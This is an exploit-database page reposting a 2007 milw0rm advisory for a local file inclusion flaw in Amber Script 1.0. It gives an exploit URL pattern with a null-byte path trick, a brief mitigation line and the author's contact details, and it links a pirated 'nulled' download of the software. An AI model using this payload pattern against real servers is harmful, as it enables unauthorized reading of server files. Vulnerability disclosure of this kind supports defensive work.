header-logo
Suggest Exploit
vendor:
Amber Script 1.0
by:
Crackers_Child
N/A
CVSS
N/A
Local File Inclusion
CWE
Product Name: Amber Script 1.0
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Amber Script Local File Inclusion

This exploit targets the Amber Script 1.0 and allows an attacker to include and view arbitrary local files on the server. The exploit URL is http://[Taget]/[amber_path]/scripts/include/show_content.php?id=LFÄ° %00

Mitigation:

Apply a patch or update the Amber Script to a secure version.
Source

Exploit-DB raw data:

+______________________________________________By Crackers_Child___________________________________________+

*
*
*    [~] Script.......:       Amber Script 1.0
*    [~] Download.....:       http://rapidshare.com/files/54891799/Amber_Script_1.0.rar (Nulled)
*    [~] Author.......:       Crackers_Child  | cybermilitan@hotmail.com & localexploit@hotmail.com
*    [~] Class........:       Local File Inclusion
*    [~] Demo.........:       http://www.script4sale.info/demo/amber/
+_______________________________________________________________________________________________________________________+


+_______________________________________________________________________________________________________________________+
*
*
*     
*
*       [~] Exploit Lfi...:     http://[Taget]/[amber_path]/scripts/include/show_content.php?id=LFÄ° %00
*
*                             
+_______________________________________________________________________________________________________________________+



        [~] iNF0......:   F3CK Y0UR simple Lf3
                      



+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
*
*
*       [~] Special Thanx.......:    str0ke, BiyoSecurity.Net, SiberSavascilar.com And All F3ckers :)
*
+_______________________________________________________________________________________________________________________+

# milw0rm.com [2007-11-24]

Navigation

Suggest Exploit

Services By CQR